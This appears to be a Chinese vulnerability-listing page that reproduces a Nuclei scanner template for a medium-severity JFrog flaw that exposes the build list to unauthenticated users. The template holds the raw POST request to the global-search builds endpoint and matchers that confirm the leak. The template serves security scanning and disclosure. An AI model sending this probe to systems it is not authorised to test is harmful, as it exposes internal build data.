jfrog-unauth-build-exposed: JFrog Unauthentication Builds

日期: 2025-08-01 | 影响软件: JFrog | POC: 已公开

漏洞描述

JFrog Builds are exposed to Unauthenticated users.

PoC代码[已公开]

id: jfrog-unauth-build-exposed

info:
  name: JFrog Unauthentication Builds
  author: dhiyaneshDK
  severity: medium
  description: JFrog Builds are exposed to Unauthenticated users.
  reference:
    - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml
  metadata:
    max-request: 1
  tags: jfrog,vuln

http:
  - raw:
      - |
        POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "last_build_number"
          - "build_name"
        condition: and
        part: body

      - type: word
        words:
          - application/json
        part: header

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203cf7ecbe95acad9e74cc4d7919530881e65c49f990a98ec6cc8621104fb0a7ae022100fcf97f9e49cc7ecbd2de295b3112f332c7fe55f16f632b42fac6905a73abd241:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/jfrog-unauth-build-exposed.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐